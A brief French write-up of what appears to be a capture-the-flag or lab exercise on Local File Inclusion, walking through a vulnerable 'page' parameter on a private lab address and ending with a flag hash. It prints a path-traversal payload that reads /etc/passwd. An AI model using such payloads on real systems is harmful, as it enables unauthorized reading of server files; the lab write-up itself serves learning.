LAG 2 – LFI (Local File Inclusion)

Sur certaines pages comme : http://192.168.1.47/?page=home

Le contenu change selon la valeur de la page.

Donc on teste si on peut charger un autre fichier : ?page=test

On a une erreur. Le serveur essaie bien de charger un fichier. Ce qui est une vulnérabilité.

On test un fichier connu du serveur : ?page=../../etc/passwd

Ce n'est souvent pas suffisant donc nous ajoutons ../ jusqu'à trouver une reponse.

http://192.168.1.47/?page=../../../../../../../etc/passwd
<img width="980" height="241" alt="Image" src="https://github.com/user-attachments/assets/ccde6638-6c2d-4f7f-9d78-6bd49580799a" />

b12c4b2cb8094750ae121a676269aa9e2872d07c06e429d25a63196ec1c8c1d0
